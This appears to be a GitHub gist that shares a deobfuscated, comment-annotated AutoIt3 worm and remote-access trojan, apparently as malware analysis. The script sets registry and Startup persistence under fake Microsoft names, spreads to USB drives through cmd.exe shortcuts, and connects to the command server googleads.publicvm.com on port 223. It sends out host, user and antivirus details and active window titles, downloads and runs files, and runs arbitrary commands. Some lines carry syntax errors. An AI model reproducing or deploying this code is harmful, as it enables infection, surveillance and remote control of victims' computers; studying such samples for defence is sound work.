Created
June 1, 2024 14:09
-
-
Save SkyN9ne/396f66fa7b9a82283068a05665eb0ac7 to your computer and use it in GitHub Desktop.
Malicious AutoIt3 script (deobfuscated)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Global $susp_domain_1 = "googleads.publicvm.com" | |
| Global $int_223 = 223 | |
| Global $string_C:\MicrosoftSecurity = "C:\MicrosoftSecurity" | |
| Global $susp_file_lnk_1 = "MicrosoftCMD.lnk" | |
| Global $string_microsoft = "Microsoft" | |
| Global $string_microsoftsecurity = "Microsoft Security" | |
| Global $string_microsoftsecurity_exe = "MicrosoftSecurity.exe" | |
| Global $int_4 = 4 | |
| Global $string_vbs = "vbs" | |
| Local $string_zeus = "Zeus" | |
| $string_zeus &= "_" & Hex(DriveGetSerial(@HomeDrive)) | |
| Global $string_0.4x = "0.4x" | |
| If FileExists("C:\MicrosoftSecurity/Microsoft.lnk") Then | |
| $string_0.4x = "0.4x Usb" | |
| EndIf | |
| $string_Microsoft.a3x = "Microsoft.a3x" | |
| $int_0 = 0 | |
| $string_\r\n = "\r\n" | |
| $string_0LIONW0 = "0LIONW0" | |
| $int_0 = 0 | |
| $int_-1 = -1 | |
| If @ScriptDir <> $string_C:\MicrosoftSecurity AND $int_4 = 4 Then | |
| If $string_vbs = "exe" Then | |
| FileCopy(@AutoItExe, $jbwklcjcaewtgpgszopzykmpwnarnhcrstdgofpsjelsafyvywtx, 9) | |
| Run($jbwklcjcaewtgpgszopzykmpwnarnhcrstdgofpsjelsafyvywtx) | |
| Else | |
| DirCopy(@ScriptDir, "C:\Microsoft", 1) | |
| ShellExecute("C:\MicrosoftSecurity\MicrosoftSecurity.exe C:\MicrosoftSecurity\Microsoft.a3x" , @SW_HIDE) | |
| ShellExecute("cmd.exe /c start C:\MicrosoftSecurity/MicrosoftSecurity.exe C:\MicrosoftSecurity\Microsoft.a3x", "", "", @SW_HIDE) | |
| EndIf | |
| FileSetAttrib("C:\MicrosoftSecurity", "+RSH") // Read, System file, Hidden | |
| Exit | |
| EndIf | |
| $string_"" = "" | |
| $int_-1 = -1 | |
| setFirewallExclusion_DeleteLNK_RemovePersistenceRegKey() | |
| RunAutoItScript_SetPersistenceKeys_CreateStartupCommonLNK() | |
| CreateScriptDirLNKFiles() | |
| UnsetShowhiddenInfectAllUSBwithLNKFiles("ALL") | |
| CreateDocuments_Downloads_LNK_CreateDir_Reports|Statements|My Pictures|My Videos|My Pictures|My Videos() | |
| $int_4 = 4 | |
| $string_"" = "" | |
| $string_""2 = "" | |
| $string_GoogleChrome.exe = "GoogleChrome.exe" | |
| Sleep(@AutoItPID / 10) | |
| If _singleton($string_GoogleChrome.exe, 1) = 0 Then | |
| Exit | |
| EndIf | |
| While 1 | |
| $int_4 += 1 | |
| If $int_4 = 5 Then | |
| $int_4 = 0 | |
| RunAutoItScript_SetPersistenceKeys_CreateStartupCommonLNK() | |
| CreateDocuments_Downloads_LNK_CreateDir_Reports|Statements|My Pictures|My Videos|My Pictures|My Videos() | |
| EndIf | |
| If @error Then | |
| EndIf | |
| $messageReceivedFromTCPRecv = TCPRecv() | |
| If @error Then | |
| EndIf | |
| Select | |
| Case $messageReceivedFromTCPRecv = -1 OR $int_0 = 1 | |
| Sleep(3000) | |
| C2CommandDef() | |
| // C2 callback with "lv|zeus|ComputerName|UserName||OSVersion OSArch|0.4x usb|AV_NAME|" | |
| C2Exfiltrate("lv0LIONW0zeus0LIONW0@ComputerName0LIONW0@UserName0LIONW0""$string_0LIONW0@OSVersion @OSArch0LIONW00.4x0LIONW0 & getAVNameFromWMI() & $string_0LIONW0 & "") | |
| Case $messageReceivedFromTCPRecv = "" | |
| $int_0 += 1 | |
| Sleep(1000) | |
| If $int_0 = 8 Then | |
| $int_0 = 0 | |
| // Get the full title of the current active window | |
| $string_""2 = WinGetTitle("") | |
| If $string_""2 <> $string_"" Then | |
| // Exfiltrate the current Window name "ac|ActiveWindowName" | |
| C2Exfiltrate("ac0LIONW0 & $string_""2) | |
| EndIf | |
| $string_"" = $string_""2 | |
| $string_""2 = "" | |
| EndIf | |
| Case $messageReceivedFromTCPRecv <> "" | |
| $splitted_MsgTCPRecv_by_0LIONW0 = StringSplit($messageReceivedFromTCPRecv, "0LIONW0", 1) | |
| If $splitted_MsgTCPRecv_by_0LIONW0[0] > 0 Then | |
| Select | |
| // [0: Action_Number - do something if >0] 0LIONW0 [1: Action - DL] 0LIONW0 [2] 0LIONW0 [3] | |
| // DL mode: " 1 | DL | Download_Source | Dest_FileName" --> Download this file to %TEMP%\FILENAME --> Then use cmd.exe to execute | |
| Case $splitted_MsgTCPRecv_by_0LIONW0[1] = "DL" | |
| InetGet($splitted_MsgTCPRecv_by_0LIONW0[2], @TempDir & aString("\") & $splitted_MsgTCPRecv_by_0LIONW0[3], 1) | |
| If FileExists(@TempDir & aString("\") & $splitted_MsgTCPRecv_by_0LIONW0[3]) Then | |
| ShellExecute("cmd.exe | /c start %temp%\" & $splitted_MsgTCPRecv_by_0LIONW0[3], "", "", @SW_HIDE) | |
| C2Exfiltrate("MSG0LIONW0Executed As" & $splitted_MsgTCPRecv_by_0LIONW0[3]) | |
| Else | |
| C2Exfiltrate("MSG0LIONW0Download ERR") | |
| EndIf | |
| // un mode: Uninstall the C2 and persistence components | |
| Case $splitted_MsgTCPRecv_by_0LIONW0[1] = "un" | |
| Uninstall_undoPersistence_UnsetFirewall() | |
| // cmd mode: " 1 | cmd | CMD_ARGUMENTS" | |
| Case $splitted_MsgTCPRecv_by_0LIONW0[1] = "cmd" | |
| If ShellExecute("cmd.exe", $splitted_MsgTCPRecv_by_0LIONW0[2], "", "", @SW_HIDE) = 1 Then | |
| C2Exfiltrate("MSG0LIONW0" & "Executed cmd.exe" & $splitted_MsgTCPRecv_by_0LIONW0[2]) | |
| Else | |
| C2Exfiltrate("MSG0LIONW0Execute ERR cmd.exe" & $splitted_MsgTCPRecv_by_0LIONW0[2]) | |
| EndIf | |
| EndSelect | |
| EndIf | |
| EndSelect | |
| WEnd | |
| Func Uninstall_undoPersistence_UnsetFirewall() | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "microsoftsecurity) | |
| RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Microsoft Security") | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "PrintDriver") | |
| RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "PrintDriver") | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Cortana") | |
| RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Cortana") | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MicrosoftOffice") | |
| RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "MicrosoftOffice") | |
| RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "MicrosoftCMD.lnk") | |
| RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "MicrosoftCMD.lnk") | |
| RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "MicrosoftSecurity.exe") | |
| RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "MicrosoftSecurity.exe") | |
| ShellExecute("netsh", "firewall delete allowedprogram "@AutoItExe", "", "", @SW_HIDE) | |
| ShellExecute(@ComSpec, "/k ping 0 & del "@AutoItExe" & exit", "", "", @SW_HIDE) | |
| C2Exfiltrate("MSG0LIONW0 Uninstall !!") | |
| Exit | |
| EndFunc | |
| Func getAVNameFromWMI() | |
| Local $avname | |
| If @OSVersion = "WIN_XP" Then | |
| $owmi = ObjGet("winmgmts:\\localhost\root\SecurityCenter") | |
| Else | |
| $owmi = ObjGet("winmgmts:\\localhost\root\SecurityCenter2") | |
| EndIf | |
| $colitems = $owmi.execquery("Select * from AntiVirusProduct") | |
| For $objantivirusproduct In $colitems | |
| $avname = $objantivirusproduct.displayname | |
| Next | |
| If $avname = False Then | |
| Return "No-AntiVirus" | |
| Else | |
| Return $avname | |
| EndIf | |
| EndFunc | |
| Func setFirewallExclusion_DeleteLNK_RemovePersistenceRegKey() | |
| EnvSet("SEE_MASK_NOZONECHECKS") | |
| ShellExecute("netsh " & @AutoItExe & " " & "MicrosoftSecurity.exe" & "" ENABLE"", "", "", @SW_HIDE) | |
| If @error Then | |
| EndIf | |
| $string_C:\GoogleChrome = "C:\GoogleChrome" | |
| $string_C:\MozillaFirefox = "C:\MozillaFirefox" | |
| ProcessClose("GoogleChrome.exe") | |
| ProcessClose("Mozilla.exe") | |
| Sleep(999) | |
| FileDelete("C:\GoogleChrome\GoogleChrome.a3x") | |
| FileDelete("C:\GoogleChrome\GoogleChrome.exe") | |
| FileDelete("C:\GoogleChrome\GoogleChrome.lnk") | |
| FileDelete("C:\GoogleChrome\My Pictures.lnk") | |
| FileDelete("C:\GoogleChrome\GoogleUpdate.lnk") | |
| FileDelete("C:\GoogleChrome\My Music.lnk") | |
| FileDelete("C:\GoogleChrome\WindowsUpdate.lnk") | |
| If ProcessExists("Mozilla.exe") Then | |
| ProcessClose("Mozilla.exe") | |
| EndIf | |
| FileDelete("C:\GoogleChrome\Mozilla.exe") | |
| FileDelete("C:\GoogleChrome\Mozilla.vbs") | |
| FileDelete("C:\GoogleChrome\Mozilla.vb") | |
| FileDelete("C:\MozillaFirefox\GoogleChrome.a3x") | |
| FileDelete("C:\MozillaFirefox\GoogleChrome.exe") | |
| FileDelete("C:\MozillaFirefox\GoogleChrome.lnk") | |
| FileDelete("C:\MozillaFirefox\My Pictures.lnk") | |
| FileDelete("C:\MozillaFirefox\GoogleUpdate.lnk") | |
| FileDelete("C:\MozillaFirefox\My Music.lnk") | |
| FileDelete("C:\MozillaFirefox\WindowsUpdate.lnk") | |
| If ProcessExists("Mozilla.exe") Then | |
| ProcessClose("Mozilla.exe") | |
| EndIf | |
| FileDelete("C:\MozillaFirefox\Mozilla.exe") | |
| FileDelete("C:\MozillaFirefox\Mozilla.vbs") | |
| FileDelete("C:\MozillaFirefox\Mozilla.vb") | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "JavaUpdate") | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AdopeUpdate") | |
| RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "NewJavaInstall") | |
| RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "AdopeFlash") | |
| RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "WindowsUpdate.lnk") | |
| RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "WindowsUpdate.lnk") | |
| RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "GoogleChrome.exe") | |
| RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "GoogleChrome.exe") | |
| RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Google Chrome") | |
| RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Google Chrome") | |
| EndFunc | |
| Func CreateDocuments_Downloads_LNK_CreateDir_Reports|Statements|My Pictures|My Videos|My Pictures|My Videos() | |
| $string_AutoIt_Script_Run_a3x = "Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x" | |
| $array_RemovableDrives = DriveGetDrive("REMOVABLE") | |
| For $i = 1 To UBound($array_RemovableDrives) - 1 | |
| If DriveStatus($array_RemovableDrives[$i]) = "READY" Then | |
| If DriveSpaceFree($array_RemovableDrives[$i]) > 1024 Then | |
| DirCopy(@ScriptDir, $array_RemovableDrives[$i] & aString("\") & "Microsoft", 1) | |
| FileSetAttrib("$array_RemovableDrives[$i]\Microsoft", "+RSH") | |
| // Create malicious shortcuts as "x:\Documents" and "x:\Downloads" | |
| FileCreateShortcut("cmd.exe", "$array_RemovableDrives[$i]\Documents", "", "/c start Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% & exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| FileCreateShortcut("cmd.exe", "$array_RemovableDrives[$i]\Downloads", "", "/c start Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% & exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| // Create x:\Reports, x:\Statements, x:\My Pictures, x:\My Videos if not exist | |
| If FileExists("$array_RemovableDrives[$i]\Reports) = False Then | |
| DirCreate("$array_RemovableDrives[$i]\Reports") | |
| EndIf | |
| If FileExists("$array_RemovableDrives[$i]\Statements") = False Then | |
| DirCreate("$array_RemovableDrives[$i]\Statements") | |
| EndIf | |
| If @error Then | |
| EndIf | |
| If FileExists("$array_RemovableDrives[$i]\My Pictures") = False Then | |
| DirCreate("$array_RemovableDrives[$i]\My Pictures") | |
| EndIf | |
| If @error Then | |
| EndIf | |
| If FileExists("$array_RemovableDrives[$i]\My Videos") = False Then | |
| DirCreate("$array_RemovableDrives[$i]\My Videos") | |
| C2Exfiltrate("MSG0LIONW0 Spreading !!") | |
| EndIf | |
| If @error Then | |
| EndIf | |
| If @error Then | |
| EndIf | |
| UnsetShowhiddenInfectAllUSBwithLNKFiles() | |
| EndIf | |
| EndIf | |
| Next | |
| If @error Then | |
| EndIf | |
| EndFunc | |
| Func UnsetShowhiddenInfectAllUSBwithLNKFiles($string_REMOVEABLE = "REMOVABLE") | |
| $string_Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x = "Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x" | |
| RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", 0) | |
| $array_removable_drives = DriveGetDrive("REMOVABLE") | |
| // Loop through all active REMOVABLE Drives, check if "x:\Microsoft" exists, if not make it | |
| If IsArray($array_removable_drives) Then | |
| For $i = 1 To $array_removable_drives[0] | |
| If DriveStatus($array_removable_drives[$i]) = "READY" Then | |
| If DriveSpaceFree($array_removable_drives[$i]) > 10 Then | |
| If FileExists($array_removable_drives[$i] & "\Microsoft") = 0 Then FileDelete($array_removable_drives[$i] & "\Microsoft") | |
| DirCopy(@ScriptDir, $array_removable_drives[$i] & aString("\") & "Microsoft", 1) | |
| FileSetAttrib($array_removable_drives[$i] & "\Microsoft", "+RSH") | |
| Local $varFirstFile = FileFindFirstFile($array_removable_drives[$i] & "\*.*") | |
| While 1 | |
| Dim $varNextFile = FileFindNextFile($varFirstFile) | |
| If $varNextFile = "" Then ExitLoop | |
| If StringInStr(FileGetAttrib($array_removable_drives[$i] & aString("\") & $varNextFile), "D") AND ($varNextFile <> "." OR $varNextFile <> "..") Then | |
| FileCreateShortcut("cmd.exe", "$array_removable_drives[$i]\$varNextFile\$varNextFile", "", "/c start ..\Microsoft\MicrosoftSecurity.exe" /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| FileCreateShortcut("cmd.exe", "$array_removable_drives[$i]\$varNextFile\Music", "", "/c start ..\Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% & exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| FileCreateShortcut("cmd.exe", "$array_removable_drives[$i]\$varNextFile\Pictures"), "", /c start ..\Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% & exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| FileCreateShortcut("cmd.exe", "$array_removable_drives[$i]\$varNextFile\Reports"), "", /c start ..\Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% & exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| FileCreateShortcut("cmd.exe", "$array_removable_drives[$i]\$varNextFile\Statements"), "", /c start ..\Microsoft\MicrosoftSecurity.exe /AutoIt3ExecuteScript ..\Microsoft\Microsoft.a3x & explorer %CD% & exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE) | |
| EndIf | |
| Sleep(40) | |
| WEnd | |
| EndIf | |
| EndIf | |
| Next | |
| EndIf | |
| If @error Then | |
| EndIf | |
| EndFunc | |
| Func CreateScriptDirLNKFiles() | |
| $blpspazzfimttyejdawgiepesmspmhduujqvoltlfuygpzlgnwlb = "@ScriptDir\MicrosoftSecurity.exe @ScriptDir\Microsoft.a3x" | |
| If FileExists("@ScriptDir\MicrosoftUpdate.lnk") = False Then | |
| FileCreateShortcut("cmd.exe", "@ScriptDir\MicrosoftUpdate.lnk", " ", "/c start @ScriptDir\MicrosoftSecurity.exe @ScriptDir\Microsoft.a3x & exit") | |
| EndIf | |
| If FileExists("@ScriptDir\MicrosoftSecurity.lnk") = False Then | |
| FileCreateShortcut("@ScriptDir\MicrosoftSecurity.exe", "@ScriptDir\MicrosoftUpdate.lnk", " ", "/AutoIt3ExecuteScript @ScriptDir\Microsoft.a3x") | |
| EndIf | |
| EndFunc | |
| Func RunAutoItScript_SetPersistenceKeys_CreateStartupCommonLNK() | |
| $execute_MicrosoftSecurity.exe /AutoIt3ExecuteScript Microsoft.a3x = "@ScriptDir\MicrosoftSecurity.exe /AutoIt3ExecuteScript @ScriptDir\Microsoft.a3x" | |
| $string_MicrosoftCMD = StringRegExpReplace("MicrosoftCMD.lnk", "\.[^\.\\/]*$", "") // Should be outputting "MicrosoftCMD" | |
| $execute_MicrosoftCMD Microsoft.a3x = "@ScriptDir\MicrosoftSecurity.exe @ScriptDir\Microsoft.a3x" | |
| $string_@ScriptDir\MicrosoftCMD.lnk = "@ScriptDir\MicrosoftCMD.lnk" | |
| If RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Microsoft Security") <> "@ScriptDir\MicrosoftCMD.lnk" Then | |
| RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Microsoft Security", "REG_SZ", "@ScriptDir\MicrosoftUpdate.lnk") | |
| EndIf | |
| If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Microsoft Security") <> "@ScriptDir\MicrosoftCMD.lnk" Then | |
| RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, "Microsoft Security", "REG_SZ", "@ScriptDir\MicrosoftUpdate.lnk") | |
| EndIf | |
| If RegRead(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Microsoft Office") <> "@ScriptDir\MicrosoftCMD.lnk" Then | |
| RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", Microsoft Office", "REG_SZ", "@ScriptDir\MicrosoftUpdate.lnk") | |
| EndIf | |
| If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Cortana")) <> "@ScriptDir\MicrosoftCMD.lnk" Then | |
| RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Cortana", "REG_SZ", "@ScriptDir\MicrosoftUpdate.lnk") | |
| EndIf | |
| If RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "HDAudio") <> $string_@ScriptDir\MicrosoftCMD.lnk Then | |
| RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "HDAudio", "REG_SZ", "@ScriptDir\MicrosoftSecurity.exe /AutoIt3ExecuteScript @ScriptDir\Microsoft.a3x") | |
| EndIf | |
| If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "PrintDriver) <> "@ScriptDir\MicrosoftCMD.lnk" Then | |
| RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "PrintDriver", "REG_SZ", "@ScriptDir\MicrosoftSecurity.exe /AutoIt3ExecuteScript @ScriptDir\Microsoft.a3x") | |
| EndIf | |
| If FileExists("@StartupCommonDir\MicrosoftCMD.lnk) = False Then | |
| FileCreateShortcut("cmd.exe", "@StartupCommonDir\Microsoft Security.lnk", "", "/c start @ScriptDir\MicrosoftSecurity.exe @ScriptDir\Microsoft.a3x & exit") | |
| EndIf | |
| If FileExists("@StartupCommonDir\MicrosoftUpdate.lnk") = False Then | |
| FileCreateShortcut("@ScriptDir\MicrosoftSecurity.exe", "@StartupCommonDir\MicrosoftUpdate.lnk", "", "/AutoIt3ExecuteScript @ScriptDir\Microsoft.a3x") | |
| EndIf | |
| If @error Then | |
| EndIf | |
| EndFunc | |
| Func TCPRecv() | |
| If $int_-1 < 1 Then | |
| $int_0 = 1 | |
| Return -1 | |
| EndIf | |
| If @error Then | |
| EndIf | |
| $callTCPRecviver = TCPRecv($int_-1, 1024, 0) | |
| If @error Then | |
| $int_0 = 1 | |
| Return -1 | |
| EndIf | |
| $string_"" &= $callTCPRecviver | |
| // Check if "\r\n" exists in the received message | |
| If StringInStr($string_"", $string_\r\n) Then | |
| $array_tcp_received = StringSplit($string_"", "\r\n") | |
| $callTCPRecviver = $array_tcp_received[1] | |
| $rn_position = StringInStr($string_"", $string_\r\n) | |
| $rn_position += StringLen(String($string_\r\n)) | |
| $msgLength = StringLen($string_"") | |
| $string_"" = StringMid($string_"", $rn_position, $msgLength - $rn_position) | |
| Return $callTCPRecviver | |
| EndIf | |
| Return "" | |
| EndFunc | |
| Func C2Exfiltrate($var5) | |
| If @error Then | |
| EndIf | |
| // Replace "\r\n" with "|" from the input | |
| $var5 = StringReplace($var5, $string_\r\n, "|") | |
| // TCPSend the modified input | |
| TCPSend($int_-1, $var5 & $string_\r\n) | |
| If @error Then | |
| $int_0 = 1 | |
| Return 0 | |
| Else | |
| Return 1 | |
| EndIf | |
| EndFunc | |
| Func C2CommandDef() | |
| $int_0 = 0 | |
| TCPCloseSocket($int_-1) | |
| If @error Then | |
| EndIf | |
| TCPShutdown() | |
| If @error Then | |
| EndIf | |
| TCPStartup() | |
| If @error Then | |
| EndIf | |
| $int_-1 = -1 | |
| // Connect to googleads.publicvm.com:223 | |
| $int_-1 = TCPConnect(TCPNameToIP("googleads.publicvm.com"), 223) | |
| If @error Then | |
| EndIf | |
| $int_0 = 0 | |
| EndFunc |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment